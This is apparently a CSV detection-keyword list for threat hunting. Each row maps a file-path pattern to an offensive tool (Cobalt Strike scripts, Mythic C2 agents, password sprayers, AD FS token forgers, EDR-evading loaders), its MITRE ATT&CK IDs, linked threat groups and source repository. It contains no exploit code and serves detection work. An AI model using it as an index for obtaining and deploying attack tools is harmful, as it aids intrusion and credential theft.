-*/ADFSpoof.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,1,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*/ADFSpray*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*/ADHunt.git*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*/ad-ldap-enum.git*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*/adm2sys.py*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*/Admin2Sys.git*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z -*/admin-panels.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/ADRecon*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Information Gathering,https://github.com/sense-of-security/ADRecon,1,1,N/A,N/A,10,1514,271,2020-06-15T05:23:14Z,2017-11-29T23:01:53Z -*/ADSearch.git*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*/aerosol.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/afp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/afp-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/afp-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/afp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/afp-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/afrog-pocs/*,offensive_tool_keyword,afrog,A tool for finding vulnerabilities,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/zan8in/afrog,1,1,N/A,N/A,10,2135,272,2023-09-28T09:41:46Z,2022-02-24T06:00:32Z -*/agent.ps1.oct*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*/agent/C/src/*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/agent/stagers/dropbox.py*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*/agent_code/Apollo/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/agent_code/Athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/agent_code/cmd_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/agent_code/dll.go*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/agent_code/merlin.*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/agent_code/powershell_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/agent_code/sh_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/agent_code/zsh_executor*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/agent_functions/*.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/agent_icons/athena.svg*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AggressiveClean.cna*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/aggressor/*.java*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/aggressor-powerview*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*/AggressorScripts*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*/AggressorScripts*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*/AggressorScripts*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/agscript *,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,0,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/agscript *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/ahmedkhlief/Ninja/*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/ahrixia/CVE_2022_0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,1,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*/ajp-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ajp-request.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/alan.log*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*/Alan.v*.zip*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*/Alaris.sln*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*/Alcatraz.exe*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz.git*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz/files/*/Alcatraz.zip*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz/x64*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/Alcatraz-gui*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/all/pupyutils/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - 